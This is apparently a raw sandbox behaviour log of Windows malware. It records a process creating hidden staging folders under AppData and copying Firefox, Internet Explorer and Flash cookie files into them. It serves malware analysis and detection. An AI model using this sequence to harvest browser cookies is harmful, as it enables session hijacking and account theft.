Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer\sys - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie - False 117
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low - False 110
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827} - True 1
Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\2314.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Fn
Create Pipe pipe\{072bb6f5-baec-d114-fc2b-8e95f08fa299} open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_TYPE_MESSAGE, max_instances = 255 True 1
Fn
Get Info C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1 type = file_attributes True 3
Fn
Get Info C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\01D4756785E0F97F09 type = file_attributes True 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\ type = file_attributes True 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite type = file_attributes False 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\ type = file_attributes True 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\Cache\ type = file_attributes False 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\ type = file_attributes True 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies type = file_attributes True 1
Fn
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin type = size True 1
Fn
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin type = size True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\\8i341t8m.default\cookies.sqlite source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer\sys\settings.sol source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\2XBM2EDN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\2XBM2EDN.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\8489XH4E.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\8489XH4E.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\B4K109K7.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B4K109K7.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\B67M68H4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B67M68H4.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\OOUVZSZN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\OOUVZSZN.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\TIGZFGLM.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\TIGZFGLM.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\XNW1G0SM.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\XNW1G0SM.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0GHTMU6X.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0GHTMU6X.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0MDKR34W.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0MDKR34W.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0Z1JIEVI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0Z1JIEVI.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\16DOE15M.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\16DOE15M.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\16Y0X4V7.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\16Y0X4V7.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1L3KU69N.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1L3KU69N.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LFQZEOH.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1LFQZEOH.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LLUY7B7.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1LLUY7B7.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1UYN2RFY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1UYN2RFY.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\23JC2UTD.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\23JC2UTD.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\2EQ4E2OJ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\2EQ4E2OJ.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\2HYILE1O.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\2HYILE1O.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\3RW4K76X.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\3RW4K76X.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\3VVSZ2CO.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\3VVSZ2CO.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4MN240WN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4MN240WN.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4O6583I0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4O6583I0.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4YWCPPXN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4YWCPPXN.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4Z6UDYLY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4Z6UDYLY.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AFMRGRY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5AFMRGRY.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5ARQYMIV.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5ARQYMIV.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AV8L20N.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5AV8L20N.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5NWXN3UI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5NWXN3UI.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5STJ6NZL.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5STJ6NZL.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5TAY54V0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5TAY54V0.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5WQEGNKI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5WQEGNKI.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\66I0OJL8.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\66I0OJL8.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\80J4IH0Y.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\80J4IH0Y.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\8FFCGS26.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\8FFCGS26.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9ABR37NL.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9ABR37NL.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9IJPMFHZ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9IJPMFHZ.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9M7ZHW1Q.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9M7ZHW1Q.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9XACNSYG.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9XACNSYG.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9Z1Y5ICI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9Z1Y5ICI.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\A0RK8A2H.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\A0RK8A2H.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\AA2IJ7JU.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\AA2IJ7JU.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\B427TFXJ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\B427TFXJ.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\BK4HNAZ1.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\BK4HNAZ1.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CC7DS78R.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CC7DS78R.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CDGOWO27.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CDGOWO27.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CYHYO8JD.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CYHYO8JD.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\D9QO3KHK.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\D9QO3KHK.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DN8YUCVA.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DN8YUCVA.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DQI7WAG8.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DQI7WAG8.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DRDF2EZX.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DRDF2EZX.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\E2KPI4ZI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\E2KPI4ZI.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\E978TFRK.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\E978TFRK.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\F68MFAMN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\F68MFAMN.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FCGXHIFT.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FCGXHIFT.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FGTTES1V.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FGTTES1V.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FLTMVY1F.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FLTMVY1F.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FOLSAQT6.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FOLSAQT6.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\GXB342YS.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\GXB342YS.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\H5LCJX1B.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\H5LCJX1B.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HBPP9XXY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HBPP9XXY.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HF8F6LU0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HF8F6LU0.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HTVL5WIW.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HTVL5WIW.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ILF13HLB.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ILF13HLB.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ISTFXHHR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ISTFXHHR.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ITD4OUAR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ITD4OUAR.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\J4JSQG9R.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\J4JSQG9R.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JQOCYKOH.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\JQOCYKOH.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JWFWLAYR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\JWFWLAYR.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\K8249Y1G.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\K8249Y1G.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\KNJ4AJDH.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\KNJ4AJDH.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\L78EW25D.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\L78EW25D.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LC10XEWL.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LC10XEWL.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LVARU12Y.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LVARU12Y.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LY1NFEKN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LY1NFEKN.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LY3FDU65.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LY3FDU65.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\M19117WZ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\M19117WZ.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MA5WDFBR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MA5WDFBR.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MBJX4MYA.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MBJX4MYA.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MCAKE788.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MCAKE788.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MIL4MU1S.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MIL4MU1S.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MM8KB9U2.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MM8KB9U2.txt True 1
Fn
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MMPF10F4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MMPF10F4.txt True 1
Fn
